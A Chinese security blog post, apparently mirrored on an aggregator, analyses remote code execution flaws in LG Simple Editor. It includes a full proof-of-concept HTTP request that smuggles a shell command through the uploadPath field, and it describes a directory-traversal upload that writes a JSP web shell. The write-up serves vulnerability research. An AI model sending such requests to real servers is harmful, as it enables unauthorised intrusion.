LG Simple Editor 的几个RCE漏洞
source link: https://y4er.com/posts/lg-simple-editor-rce/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
LG Simple Editor 的几个RCE漏洞
LG是一家专门搞LED的公司,旗下有一些产品,这次看的是zdi爆出来的LG Simple Editor,公网数量虽然不多,但是漏洞是未授权RCE。
https://www.zerodayinitiative.com/advisories/ZDI-23-1208/
com.lge.simpleeditor.content.controller.ImageManagerRestController#uploadVideo
漏洞很简单
com.lge.simpleeditor.content.service.CanvasServiceImpl#readVideoInfo 存在拼接
最终cmd使用filePath拼接为
MediaInfo --Inform=General;%Duration% -f "C:/LG Simple Editor/server/webapps/simpleeditor/sessions/1.mp4" > "C:/LG Simple Editor/server/webapps/simpleeditor/sessions/1.mp4.ini"
用双引号包裹了,然后用cmd /c 启动
那也就是说只要能在cmd变量里逃逸出双引号就行
直接使用双引号闭合发现报错
想起来在Windows里不能出现特殊字符串作为文件夹/文件的名字,于是改为\"/../
,通过这种方式闭合双引号之后,再用../
跳级目录,这样就不会出现报错了。
构造请求包如下
POST /simpleeditor/imageManager/uploadVideo.do HTTP/1.1
Host: 172.16.1.179:8080
Content-Length: 770
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyb6VMLBDGWBAjiJA
Origin: http://172.16.1.179:8080
Referer: http://172.16.1.179:8080/simpleeditor/index.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ga;q=0.6
Connection: close
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile"; filename="1.mp4"
Content-Type: video/mp4
1
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadPath"
/sessions\"&ping localhost -nc 1&\..\..\..\
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_x"
-1000
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_y"
-1000
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_width"
1064
------WebKitFormBoundaryyb6VMLBDGWBAjiJA
Content-Disposition: form-data; name="uploadFile_height"
599
------WebKitFormBoundaryyb6VMLBDGWBAjiJA--
注入的命令如下
# 另一个rce
仔细看了看功能点,发现可以跨目录任意文件上传
文件路径由1标的originalFilePath决定,而1标取决于2标的uploadPath和fileName变量,uploadPath在4标从http请求中获取,这里可以跨目录,而fileName在3标中如果文件名中有.
才会判断后缀,那么可以将uploadPath
赋值为/js/1.
,而fileName直接给一个jsp
文件名,这样拼接成一个/js/1.jsp
的originalFilePath路径。
这样就能写一个jsp shell了。
shell路径在
看了zdi爆了一堆这个产品的洞,看了看都是简单洞,没必要写了。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK